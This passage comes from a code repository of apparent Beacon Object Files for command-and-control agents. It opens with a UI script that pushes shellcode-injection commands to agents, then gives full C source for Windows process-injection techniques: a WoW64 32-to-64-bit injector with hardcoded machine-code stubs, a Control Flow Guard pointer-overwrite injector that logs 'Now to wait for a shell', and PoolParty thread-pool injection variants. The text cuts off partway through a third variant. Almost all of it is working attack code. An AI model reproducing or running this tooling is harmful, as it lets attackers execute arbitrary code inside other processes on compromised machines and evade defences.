    combo_poolparty_variant.setVisible(false);

    let text_description = form.create_textmulti( methods["inject-sec"] );
    text_description.setReadOnly(true);

    let layout = form.create_gridlayout();
    layout.addWidget(label_shellcode,  0, 0, 1, 1);
    layout.addWidget(text_shellcode,   0, 1, 1, 1);
    layout.addWidget(button_shellcode, 0, 2, 1, 1);
    layout.addWidget(label_method,     1, 0, 1, 1);
    layout.addWidget(combo_method,     1, 1, 1, 2);
    layout.addWidget(label_poolparty_variant, 2, 0, 1, 1);
    layout.addWidget(combo_poolparty_variant, 2, 1, 1, 2);
    layout.addWidget(text_description, 3, 0, 1, 3);

    form.connect(combo_method, "currentTextChanged", function(text) {
        text_description.setText( methods[text] );

        label_poolparty_variant.setVisible(false);
        combo_poolparty_variant.setVisible(false);
        if(text == "inject-poolparty") {
            label_poolparty_variant.setVisible(true);
            combo_poolparty_variant.setVisible(true);
        }
    });

    form.connect(button_shellcode, "clicked", function() {
        text_shellcode.setText( ax.prompt_open_file() );
    });

    let dialog = form.create_dialog("Inject shellcode");
    dialog.setSize(460, 240);
    dialog.setLayout(layout);
    dialog.setButtonsText("Inject", "Cancel");
    while ( dialog.exec() == true )  {
        let shellcode_path = text_shellcode.text();
        if(shellcode_path.length == 0) { ax.show_message("Error", "Shellcode not specified"); continue; }

        let shellcode_content = ax.file_read(shellcode_path);
        if(shellcode_content.length == 0) { ax.show_message("Error", `file ${shellcode_path} not readed`); continue; }

        let method  = combo_method.currentText();
        let variant = combo_poolparty_variant.currentText();

        process_list.forEach((proc) => {
            if(method == "inject-poolparty") {
                let command = `${method} ${variant} ${proc.pid} ${shellcode_path}`;
                ax.execute_command(proc.agent_id, command);
            } else {
                let command = `${method} ${proc.pid} ${shellcode_path}`;
                ax.execute_command(proc.agent_id, command);
            }
        });
        break;
    }
});
menu.add_processbrowser(inject_action, ["beacon", "gopher", "kharon"], ["windows"]);

================================================
FILE: Injection-BOF/inject_32to64/inject_32to64.c
================================================
/*
References:
- https://maldevacademy.com/new/modules/64
- https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/migrate/executex64.asm 
*/

#include <windows.h>
#include "beacon.h"

// Kernel32 Functions
WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD);
WINBASEAPI LPVOID WINAPI KERNEL32$VirtualAllocEx(HANDLE, LPVOID, SIZE_T, DWORD, DWORD);
WINBASEAPI LPVOID WINAPI KERNEL32$VirtualAlloc(LPVOID, SIZE_T, DWORD, DWORD);
WINBASEAPI BOOL WINAPI KERNEL32$VirtualFree(LPVOID, SIZE_T, DWORD);
WINBASEAPI BOOL WINAPI KERNEL32$WriteProcessMemory(HANDLE, LPVOID, LPCVOID, SIZE_T, PSIZE_T);
WINBASEAPI DWORD WINAPI KERNEL32$ResumeThread(HANDLE);
WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle(HANDLE);
WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentProcess(VOID);
WINBASEAPI DWORD WINAPI KERNEL32$GetLastError(VOID);

NTSYSAPI NTSTATUS NTAPI NTDLL$NtQueryInformationProcess(HANDLE, ULONG, PVOID, ULONG, PULONG);

WINBASEAPI void * __cdecl MSVCRT$memset(void *, int, size_t);
WINBASEAPI void * __cdecl MSVCRT$memcpy(void *, const void *, size_t);

#define ProcessWow64Information 26

typedef struct _WOW64CONTEXT {
    union {
        HANDLE hProcess;
        BYTE   bPadding1[8];
    } h;

    union {
        LPVOID lpStartAddress;
        BYTE   bPadding2[8];
    } s;

    union {
        LPVOID lpParameter;
        BYTE   bPadding3[8];
    } p;

    union {
        HANDLE hThread;
        BYTE   bPadding4[8];
    } t;
} WOW64CONTEXT, * PWOW64CONTEXT;

typedef BOOL(WINAPI* FN_FUNCTION64)(
    _In_ ULONG Arg
    );

typedef ULONG(WINAPI* FN_EXECUTE64)(
    _In_ FN_FUNCTION64 Function64,
    _In_ PVOID         Arg
    );

// code stub that performs a context switch to 64-bit mode
// in the current Wow64 process to allow execution of x64
// code and revert back to Wow64 after finishing execution
static unsigned char bExecute64[] = {
    0x55,0x89,0xE5,0x56,0x57,0x8B,0x75,0x08,0x8B,0x4D,0x0C,0xE8,0x00,0x00,0x00,0x00,
    0x58,0x83,0xC0,0x2B,0x83,0xEC,0x08,0x89,0xE2,0xC7,0x42,0x04,0x33,0x00,0x00,0x00,
    0x89,0x02,0xE8,0x0F,0x00,0x00,0x00,0x66,0x8C,0xD8,0x66,0x8E,0xD0,0x83,0xC4,0x14,
    0x5F,0x5E,0x5D,0xC2,0x08,0x00,0x8B,0x3C,0xE4,0xFF,0x2A,0x48,0x31,0xC0,0x57,0xFF,
    0xD6,0x5F,0x50,0xC7,0x44,0x24,0x04,0x23,0x00,0x00,0x00,0x89,0x3C,0x24,0xFF,0x2C,
    0x24
};

// x64 code stub which is going to create a remote thread
// in the specified x64 process using RtlCreateUserThread
static unsigned char bFunction64[] = {
    0xFC,0x48,0x89,0xCE,0x48,0x89,0xE7,0x48,0x83,0xE4,0xF0,0xE8,0xC8,0x00,0x00,0x00,
    0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xD2,0x65,0x48,0x8B,0x52,0x60,0x48,
    0x8B,0x52,0x18,0x48,0x8B,0x52,0x20,0x48,0x8B,0x72,0x50,0x48,0x0F,0xB7,0x4A,0x4A,
    0x4D,0x31,0xC9,0x48,0x31,0xC0,0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0x41,0xC1,0xC9,
    0x0D,0x41,0x01,0xC1,0xE2,0xED,0x52,0x41,0x51,0x48,0x8B,0x52,0x20,0x8B,0x42,0x3C,
    0x48,0x01,0xD0,0x66,0x81,0x78,0x18,0x0B,0x02,0x75,0x72,0x8B,0x80,0x88,0x00,0x00,
    0x00,0x48,0x85,0xC0,0x74,0x67,0x48,0x01,0xD0,0x50,0x8B,0x48,0x18,0x44,0x8B,0x40,
    0x20,0x49,0x01,0xD0,0xE3,0x56,0x48,0xFF,0xC9,0x41,0x8B,0x34,0x88,0x48,0x01,0xD6,
    0x4D,0x31,0xC9,0x48,0x31,0xC0,0xAC,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,0x38,0xE0,
    0x75,0xF1,0x4C,0x03,0x4C,0x24,0x08,0x45,0x39,0xD1,0x75,0xD8,0x58,0x44,0x8B,0x40,
    0x24,0x49,0x01,0xD0,0x66,0x41,0x8B,0x0C,0x48,0x44,0x8B,0x40,0x1C,0x49,0x01,0xD0,
    0x41,0x8B,0x04,0x88,0x48,0x01,0xD0,0x41,0x58,0x41,0x58,0x5E,0x59,0x5A,0x41,0x58,
    0x41,0x59,0x41,0x5A,0x48,0x83,0xEC,0x20,0x41,0x52,0xFF,0xE0,0x58,0x41,0x59,0x5A,
    0x48,0x8B,0x12,0xE9,0x4F,0xFF,0xFF,0xFF,0x5D,0x4D,0x31,0xC9,0x41,0x51,0x48,0x8D,
    0x46,0x18,0x50,0xFF,0x76,0x10,0xFF,0x76,0x08,0x41,0x51,0x41,0x51,0x49,0xB8,0x01,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x31,0xD2,0x48,0x8B,0x0E,0x41,0xBA,0xC8,
    0x38,0xA4,0x40,0xFF,0xD5,0x48,0x85,0xC0,0x74,0x0C,0x48,0xB8,0x00,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,0xEB,0x0A,0x48,0xB8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
    0x48,0x83,0xC4,0x50,0x48,0x89,0xFC,0xC3
};

BOOL IsProcessWow64(_In_ HANDLE ProcessHandle) {
    NTSTATUS Status = 0;
    PVOID pIsWow64 = NULL;

    if (!ProcessHandle) {
        return FALSE;
    }

    if ((Status = NTDLL$NtQueryInformationProcess(ProcessHandle, ProcessWow64Information, &pIsWow64, sizeof(PVOID), NULL)) != 0x00) {
        BeaconPrintf(CALLBACK_ERROR, "[!] NtQueryInformationProcess Failed With Error: 0x%0.8X", Status);
        return FALSE;
    }

    return pIsWow64 ? TRUE : FALSE;
}

BOOL Wow64Inject(_In_ ULONG ProcessId, _In_ PVOID ShellcodeBuf, _In_ ULONG ShellcodeLen) {
    HANDLE        ProcessHandle = NULL;
    PVOID         VirtualMemory = NULL;
    PVOID         ExecMem64     = NULL;
    PVOID         ExecMem32     = NULL;
    FN_EXECUTE64  FnExecute64   = NULL;
    FN_FUNCTION64 FnFunction64  = NULL;
    WOW64CONTEXT  Wow64Ctx      = {0};
    SIZE_T        Written       = 0;
    BOOL          Success       = FALSE;

    ProcessHandle = KERNEL32$OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
    if (!ProcessHandle) {
        BeaconPrintf(CALLBACK_ERROR, "[-] OpenProcess Failed with Error: %ld", KERNEL32$GetLastError());
        goto LEAVE;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[*] Opened process handle to %ld: 0x%p", ProcessId, ProcessHandle);

    if (IsProcessWow64(ProcessHandle)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Remote process %ld is a Wow64 process", ProcessId);
        goto LEAVE;
    }

    ExecMem32 = KERNEL32$VirtualAlloc(NULL, sizeof(bExecute64), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!ExecMem32) {
        BeaconPrintf(CALLBACK_ERROR, "[-] VirtualAlloc failed for bExecute64: %ld", KERNEL32$GetLastError());
        return FALSE;
    }

    MSVCRT$memcpy(ExecMem32, bExecute64, sizeof(bExecute64));

    ExecMem64 = KERNEL32$VirtualAlloc(NULL, sizeof(bFunction64), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!ExecMem64) {
        BeaconPrintf(CALLBACK_ERROR, "[-] VirtualAlloc failed for bFunction64: %ld", KERNEL32$GetLastError());
        KERNEL32$VirtualFree(ExecMem32, 0, MEM_RELEASE);
        return FALSE;
    }

    MSVCRT$memcpy(ExecMem64, bFunction64, sizeof(bFunction64));

    FnExecute64  = (FN_EXECUTE64)ExecMem32;
    FnFunction64 = (FN_FUNCTION64)ExecMem64;
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Process %ld (0x%p) is 64-bit", ProcessId, ProcessHandle);

    VirtualMemory = KERNEL32$VirtualAllocEx(ProcessHandle, NULL, ShellcodeLen, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!VirtualMemory) {
        BeaconPrintf(CALLBACK_ERROR, "[-] VirtualAllocEx Failed with Error: %ld", KERNEL32$GetLastError());
        goto LEAVE;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[*] Allocated memory @ %p [%ld bytes]", VirtualMemory, ShellcodeLen);

    if (!KERNEL32$WriteProcessMemory(ProcessHandle, VirtualMemory, ShellcodeBuf, ShellcodeLen, &Written)){
        BeaconPrintf(CALLBACK_ERROR, "[-] WriteProcessMemory Failed with Error: %ld", KERNEL32$GetLastError());
        goto LEAVE;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[*] Written to memory @ %p [%ld bytes written]", VirtualMemory, Written);

    MSVCRT$memset(&Wow64Ctx, 0, sizeof(WOW64CONTEXT));
    Wow64Ctx.h.hProcess       = ProcessHandle;
    Wow64Ctx.s.lpStartAddress = VirtualMemory;
    Wow64Ctx.p.lpParameter    = NULL;
    Wow64Ctx.t.hThread        = NULL;

    // switch the processor to be 64-bit mode and execute
    if (!FnExecute64(FnFunction64, &Wow64Ctx)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to switch processor context and execute 64-bit stub");
        goto LEAVE;
    }

    if (!Wow64Ctx.t.hThread) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create remote thread under 64-bit mode");
        goto LEAVE;
    }

    // resume thread that has been created in a suspended state from FnFunction64
    if (KERNEL32$ResumeThread(Wow64Ctx.t.hThread) == (DWORD)-1) {
        BeaconPrintf(CALLBACK_ERROR, "[-] ResumeThread Failed with Error: %ld", KERNEL32$GetLastError());
        goto LEAVE;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully injected thread (0x%p)", Wow64Ctx.t.hThread);

    Success = TRUE;

LEAVE:
    if (Wow64Ctx.t.hThread) {
        KERNEL32$CloseHandle(Wow64Ctx.t.hThread);
    }
    if (ProcessHandle) {
        KERNEL32$CloseHandle(ProcessHandle);
        ProcessHandle = NULL;
    }
    if (ExecMem32) {
        KERNEL32$VirtualFree(ExecMem32, 0, MEM_RELEASE);
    }
    if (ExecMem64) {
        KERNEL32$VirtualFree(ExecMem64, 0, MEM_RELEASE);
    }

    return Success;
}

void go(char * args, int len) {
    datap parser;
    BeaconDataParse(&parser, args, len);

    DWORD procID = BeaconDataInt(&parser);
    int shellcodeSize = 0;
    CHAR* shellcode = BeaconDataExtract(&parser, &shellcodeSize);

    BeaconPrintf(CALLBACK_OUTPUT, "[*] Target PID: %d", procID);
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Shellcode Size: %d bytes", shellcodeSize);

    if (!Wow64Inject(procID, shellcode, (ULONG)shellcodeSize)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to inject into %ld", procID);
        return;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Injection completed successfully");
}



================================================
FILE: Injection-BOF/inject_cfg/inject_cfg.c
================================================
#include <windows.h>
#include "beacon.h"

//
// Macros (I hate typing BeaconPrintf)
//
#define LOG_INFO(fmt, ...) ( BeaconPrintf(CALLBACK_OUTPUT, fmt, ##__VA_ARGS__) )
#define LOG_ERROR(fmt, ...) ( BeaconPrintf(CALLBACK_ERROR, fmt, ##__VA_ARGS__) )

//
// Prototypes
//
WINBASEAPI INT __cdecl MSVCRT$memcmp(const void *_Buf1, const void *_Buf2, size_t _Size);
WINBASEAPI void *__cdecl MSVCRT$memcpy(void *_Dst, const void *_Src, size_t _MaxCount);
WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle(HANDLE hObject);
WINBASEAPI HMODULE WINAPI KERNEL32$GetModuleHandleA(LPCSTR lpProcName);
WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE hModule, LPCSTR lpProcName);
WINBASEAPI HMODULE WINAPI KERNEL32$LoadLibraryA(LPCSTR lpLibFileName);
WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId);
WINBASEAPI LPVOID WINAPI KERNEL32$VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
WINBASEAPI BOOL WINAPI KERNEL32$VirtualProtectEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
WINBASEAPI BOOL WINAPI KERNEL32$WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);
NTSYSAPI SIZE_T NTAPI NTDLL$RtlCompareMemory(const VOID *Source1, const VOID *Source2, SIZE_T Length);

PVOID EggHunt(_In_ PVOID RegionStart, _In_ SIZE_T RegionLength, _In_ PVOID Egg, _In_ SIZE_T EggLength);
void go(char *args, int alen);


//
// Search a region of memory for an egg. Returns NULL on failure.
//
PVOID EggHunt(_In_ PVOID RegionStart, _In_ SIZE_T RegionLength, _In_ PVOID Egg, _In_ SIZE_T EggLength)
{
    if (!RegionStart || !RegionLength || !Egg || !EggLength)
        return NULL;

    for (CHAR* pchar = (CHAR*)RegionStart; RegionLength >= EggLength; ++pchar, --RegionLength)
    {
        if (MSVCRT$memcmp(pchar, Egg, EggLength) == 0)
            return pchar;
    }
    return NULL;
}

void go(char *args, int alen)
{
    // param vars
    datap parser;
    INT pid;
    CHAR* shellcode;
    INT shellcode_len;

    // other vars
    HMODULE combase;
    FARPROC NdrProxyForwardingFunction13;
    BYTE egg[] = {
        0x4c, 0x8b, 0x11,
        0x49, 0x8b, 0x4a, 0x68,
        0xff, 0x15
    };
    BYTE* egg_start;
    BYTE* egg_end;
    DWORD offset;
    FARPROC* __guard_check_icall_fptr;
    HANDLE process = INVALID_HANDLE_VALUE;
    PVOID base_address;
    BYTE stub[] = {
        0x41,0x54,0x53,0x48,0x83,0xec,0x58,0x50,0x57,0x51,0x57,0x56,0x41,0x50,0x41,0x51,0x41,0x52,0x41,0x53,0x41,0x54,0x41,0x55,0x4c,0x8d,0x4c,0x24,0x4c,0xc7,0x44,0x24,0x4c,0x00,0x00,0x00,0x00,0xba,0x08,0x00,0x00,0x00,
        0x49,0xbc,
        0x33,0x33,0x33,0x33,0x33,0x33,0x33,0x33,
        0x4c,0x89,0x4c,0x24,0x38,0x4c,0x89,0xe1,0x41,0xb8,0x04,0x00,0x00,0x00,0x48,0xbb,0x11,0x11,0x11,0x11,0x11,0x11,0x11,0x11,0xff,0xd3,0x4c,0x8b,0x4c,0x24,0x38,0x44,0x8b,0x44,0x24,0x4c,0x4c,0x89,0xe1,0x48,0xb8,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0xba,0x08,0x00,0x00,0x00,0x49,0x89,0x04,0x24,0xff,0xd3,0xc7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x45,0x31,0xc9,0x31,0xd2,0x48,0xc7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0x31,0xc9,0x49,0xb8,0x55,0x55,0x55,0x55,0x55,0x55,0x55,0x55,0x48,0xb8,0x22,0x22,0x22,0x22,0x22,0x22,0x22,0x22,0xff,0xd0,0x58,0x5f,0x59,0x5f,0x5e,0x41,0x58,0x41,0x59,0x41,0x5a,0x41,0x5b,0x41,0x5c,0x41,0x5d,0x48,0x83,0xc4,0x58,0x5b,0x41,0x5c,0xc3
    };
    SIZE_T bytes_written;
    HMODULE kernel32;
    FARPROC _VirtualProtect;
    FARPROC _CreateThread;
    BYTE* shellcode_address;
    DWORD old_prot;

    //
    // Parse command line arguments
    //
    BeaconDataParse(&parser, args, alen);
    pid = BeaconDataInt(&parser);
    shellcode = BeaconDataExtract(&parser, &shellcode_len);

    //
    // Resolve combase.dll!NdrProxyForwardingFunction13
    //
    combase = KERNEL32$LoadLibraryA("combase.dll");
    if (combase == NULL)
    {
        LOG_ERROR("Failed to load/resolve combase.dll via Kernel32!LoadLibraryA");
        return;
    }

    NdrProxyForwardingFunction13 = KERNEL32$GetProcAddress(combase, "NdrProxyForwardingFunction13");
    if (NdrProxyForwardingFunction13 == NULL)
    {
        LOG_ERROR("Failed to resolve combase.dll!NdrProxyForwardingFunction13 via Kernel32!GetProcAddress");
        return;
    }

    //
    // Egghunt for "call qword [rel __guard_check_icall_fptr]" instruction.
    //
    // mov     r10, qword [rcx]
    // mov     rcx, qword [r10+0x68]
    // call    qword [rel __guard_check_icall_fptr]  {_guard_check_icall_nop}
    // next 4 bytes are the offset
    egg_start = (BYTE*)EggHunt(NdrProxyForwardingFunction13, 256, egg, sizeof(egg));
    if (egg_start == NULL)
    {
        LOG_ERROR("Failed to locate __guard_check_icall_fptr call offset @ combase.dll!NdrProxyForwardingFunction13");
        return;
    }
    egg_end = egg_start + sizeof(egg);

    //
    // Get the offset to __guard_check_icall_fptr located at the end of the egg.
    //
    offset = *(DWORD*)egg_end;

    //
    // Resolve __guard_check_icall_fptr and subsequently _guard_check_icall_nop using offset.
    //
    __guard_check_icall_fptr = (FARPROC*)(egg_end + offset + sizeof(DWORD));

    //
    // Check that the pointer is correct
    // note: likely worth checking whether __guard_check_icall_fptr is within the .rdata section of combase.dll before dereferencing.
    // note2: compiler somehow decides this is always hit?
    //if (*(BYTE*)orig_guard_check_icall_nop != '\xc2')
    //{
    //    LOG_ERROR("Failed to resolve combase.dll!__guard_check_icall_fptr");
    //    return;
    //}

    //
    // Open handle to target process
    //
    process = KERNEL32$OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)pid);
    if (process == NULL)
    {
        LOG_ERROR("Failed to open handle to target process (pid: %d). Are you sure it is correct?", pid);
        return;
    }

    //
    // Allocate memory for shellcode
    // TODO: use something more stealthy than VirtualAllocEx->WriteProcessMemory
    //
    base_address = KERNEL32$VirtualAllocEx(process, NULL, shellcode_len + 0xc0, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (base_address == NULL)
    {
        LOG_ERROR("Failed to allocate memory for shellcode in target process via Kernel32!VirtualAllocEx");
        goto CLEANUP;
    }

    //
    // Modify placeholder values in shellcode stub.
    //
    kernel32 = KERNEL32$GetModuleHandleA("KERNEL32.DLL");
    _VirtualProtect = KERNEL32$GetProcAddress(kernel32, "VirtualProtect");
    _CreateThread = KERNEL32$GetProcAddress(kernel32, "CreateThread");
    shellcode_address = base_address + 0xc0;
    MSVCRT$memcpy(stub + 44, &__guard_check_icall_fptr, sizeof(FARPROC*));
    MSVCRT$memcpy(stub + 68, &_VirtualProtect, sizeof(FARPROC));
    MSVCRT$memcpy(stub + 93, __guard_check_icall_fptr, sizeof(FARPROC));
    MSVCRT$memcpy(stub + 138, &shellcode_address, sizeof(FARPROC));
    MSVCRT$memcpy(stub + 148, &_CreateThread, sizeof(FARPROC));

    //
    // Write stub & shellcode to allocated memory and change protections from RW -> RX
    // TODO: like before, this could be stealthier (e.g. using a code cave)
    //
    if (!KERNEL32$WriteProcessMemory(process, base_address, stub, sizeof(stub), &bytes_written))
    {
        if (bytes_written < sizeof(stub))
        {
            LOG_ERROR("Kernel32!WriteProcessMemory performed only a partial shellcode stub write. Stopping to prevent crashes.");
            goto CLEANUP;
        }
        LOG_ERROR("Failed to write shellcode stub to target process memory via Kernel32!WriteProcessMemory. Perhaps the process closed?");
        goto CLEANUP;
    }

    if (!KERNEL32$WriteProcessMemory(process, shellcode_address, shellcode, shellcode_len, &bytes_written))
    {
        if (bytes_written < shellcode_len)
        {
            LOG_ERROR("Kernel32!WriteProcessMemory performed only a partial shellcode write. Stopping to prevent crashes.");
            goto CLEANUP;
        }
        LOG_ERROR("Failed to write shellcode to target process memory via Kernel32!WriteProcessMemory. Perhaps the process closed?");
        goto CLEANUP;
    }
    
    if (!KERNEL32$VirtualProtectEx(process, base_address, shellcode_len + 0xc0, PAGE_EXECUTE_READ, &old_prot))
    {
        LOG_ERROR("Failed to change allocated shellcode memory permissions from RW->RX via Kernel32!VirtualProtectEx");
        goto CLEANUP;
    }

    //
    // Overwrite __guard_check_icall_fptr with shellcode pointer.
    //
    if (!KERNEL32$VirtualProtectEx(process, __guard_check_icall_fptr, sizeof(FARPROC), PAGE_READWRITE, &old_prot))
    {
        LOG_ERROR("Failed to change combase.dll!.rdata memory permissions from R->RW via Kernel32!VirtualProtectEx");
        goto CLEANUP;
    }

    if (!KERNEL32$WriteProcessMemory(process, __guard_check_icall_fptr, &base_address, sizeof(PVOID), &bytes_written))
    {
        if (bytes_written < shellcode_len)
        {
            LOG_ERROR("Kernel32!WriteProcessMemory performed only a partial pointer write. Stopping to prevent crashes.");
            goto CLEANUP;
        }
        LOG_ERROR("Failed to overwrite combase.dll!__guard_check_icall_fptr with shellcode pointer via Kernel32!WriteProcessMemory. Perhaps the process closed?");
        goto CLEANUP;
    }
    LOG_INFO("Successfully overwritten combase.dll!__guard_check_icall_fptr. Now to wait for a shell :)");

    if (!KERNEL32$VirtualProtectEx(process, __guard_check_icall_fptr, sizeof(FARPROC), old_prot, &old_prot))
    {
        LOG_ERROR("Failed to restore combase.dll!.rdata memory permissions from RW->R via Kernel32!VirtualProtectEx");
        goto CLEANUP;
    }
    
CLEANUP:
    KERNEL32$CloseHandle(process);
}

================================================
FILE: Injection-BOF/inject_poolparty/1.h
================================================
#include "PoolParty.h"

void WorkerFactoryStartRoutineOverwrite(HANDLE hTarget, CHAR* shellcode, SIZE_T shellcodeSize) {
    _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));
    _NtSetInformationWorkerFactory NtSetInformationWorkerFactory = (_NtSetInformationWorkerFactory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtSetInformationWorkerFactory"));

    WORKER_FACTORY_BASIC_INFORMATION WorkerFactoryInformation = GetWorkerFactoryBasicInformation();

    DWORD dwOldProtect = NULL;
    KERNEL32$VirtualProtectEx(hTarget, WorkerFactoryInformation.StartRoutine, shellcodeSize, PAGE_READWRITE, &dwOldProtect);

    NTSTATUS Ntstatus = NtWriteVirtualMemory(hTarget, WorkerFactoryInformation.StartRoutine, shellcode, shellcodeSize, NULL);
    KERNEL32$VirtualProtectEx(hTarget, WorkerFactoryInformation.StartRoutine, shellcodeSize, dwOldProtect, &dwOldProtect);
    ULONG WorkerFactoryMinimumThreadNumber = WorkerFactoryInformation.TotalWorkerCount + 1;

    Ntstatus = NtSetInformationWorkerFactory(hTpWorkerFactory, WorkerFactoryThreadMinimum, &WorkerFactoryMinimumThreadNumber, sizeof(ULONG));

}

void Inject1(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
    HANDLE hTarget = NULL;
    hTarget = KERNEL32$OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION, FALSE, dwTargetProcessId);

    if (hTarget) {
        HijackTpWorkerFactoryHandle(hTarget, WORKER_FACTORY_ALL_ACCESS);
        WorkerFactoryStartRoutineOverwrite(hTarget, shellcode, shellcodeSize);
    } else {
          BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
      }
}


================================================
FILE: Injection-BOF/inject_poolparty/2.h
================================================
#include "PoolParty.h"

void RemoteTpWorkInsertion(HANDLE hTarget, PVOID pShellcodeAddress) {
    _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));
    
    WORKER_FACTORY_BASIC_INFORMATION WorkerFactoryInformation = GetWorkerFactoryBasicInformation();
    
    PFULL_TP_POOL TargetTpPool = NULL;
    TargetTpPool = (PFULL_TP_POOL)MSVCRT$calloc(1, sizeof(PFULL_TP_POOL));
    SIZE_T stBytesRead = 0;
    KERNEL32$ReadProcessMemory(hTarget, WorkerFactoryInformation.StartParameter, TargetTpPool, sizeof(FULL_TP_POOL), &stBytesRead);

    PTPP_QUEUE TargetTaskQueueHighPriorityList = &TargetTpPool->TaskQueue[TP_CALLBACK_PRIORITY_HIGH]->Queue;
    
    PFULL_TP_WORK pTpWork = KERNEL32$CreateThreadpoolWork((PTP_WORK_CALLBACK)pShellcodeAddress, NULL, NULL);
    pTpWork->CleanupGroupMember.Pool = (PFULL_TP_POOL)(WorkerFactoryInformation.StartParameter);
    pTpWork->Task.ListEntry.Flink = TargetTaskQueueHighPriorityList;
    pTpWork->Task.ListEntry.Blink = TargetTaskQueueHighPriorityList;
    pTpWork->WorkState.Exchange = 0x2;

    DWORD dwOldProtect = NULL;
    PFULL_TP_WORK pRemoteTpWork = (PFULL_TP_WORK)(KERNEL32$VirtualAllocEx(hTarget, NULL, sizeof(FULL_TP_WORK), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE));
    NTSTATUS Ntstatus = NtWriteVirtualMemory(hTarget, pRemoteTpWork, pTpWork, sizeof(FULL_TP_WORK), NULL);

    KERNEL32$VirtualProtectEx(hTarget, pRemoteTpWork, sizeof(FULL_TP_WORK), PAGE_EXECUTE_READ, &dwOldProtect);

    PLIST_ENTRY RemoteWorkItemTaskList = NULL;
    RemoteWorkItemTaskList = (PLIST_ENTRY)MSVCRT$calloc(1, sizeof(PLIST_ENTRY));
    RemoteWorkItemTaskList = &pRemoteTpWork->Task.ListEntry;

    NtWriteVirtualMemory(hTarget, &TargetTpPool->TaskQueue[TP_CALLBACK_PRIORITY_HIGH]->Queue.Flink, &RemoteWorkItemTaskList, sizeof(RemoteWorkItemTaskList), NULL);
    NtWriteVirtualMemory(hTarget, &TargetTpPool->TaskQueue[TP_CALLBACK_PRIORITY_HIGH]->Queue.Blink, &RemoteWorkItemTaskList, sizeof(RemoteWorkItemTaskList), NULL);
}

void Inject2(DWORD dwTargetProcessId, CHAR* shellcode, SIZE_T shellcodeSize) {
    _NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtWriteVirtualMemory"));
    
    HANDLE hTarget = NULL;
    DWORD dwOldProtect = NULL;
    hTarget = KERNEL32$OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION, FALSE, dwTargetProcessId);
    
    if (hTarget) {
        HijackTpWorkerFactoryHandle(hTarget, WORKER_FACTORY_ALL_ACCESS);
        
        PVOID pShellcodeAddress = KERNEL32$VirtualAllocEx(hTarget, NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        NtWriteVirtualMemory(hTarget, pShellcodeAddress, shellcode, shellcodeSize, NULL);
        KERNEL32$VirtualProtectEx(hTarget, pShellcodeAddress, shellcodeSize, PAGE_EXECUTE_READ, &dwOldProtect);
        
        RemoteTpWorkInsertion(hTarget, pShellcodeAddress);
    } else { 
        BeaconPrintf(CALLBACK_OUTPUT, "PID %d inaccessible", dwTargetProcessId);
    }
}

================================================
FILE: Injection-BOF/inject_poolparty/3.h
================================================
#include "PoolParty.h"

void RemoteTpWaitInsertion(HANDLE hTarget, LPVOID pShellcodeAddress)
{
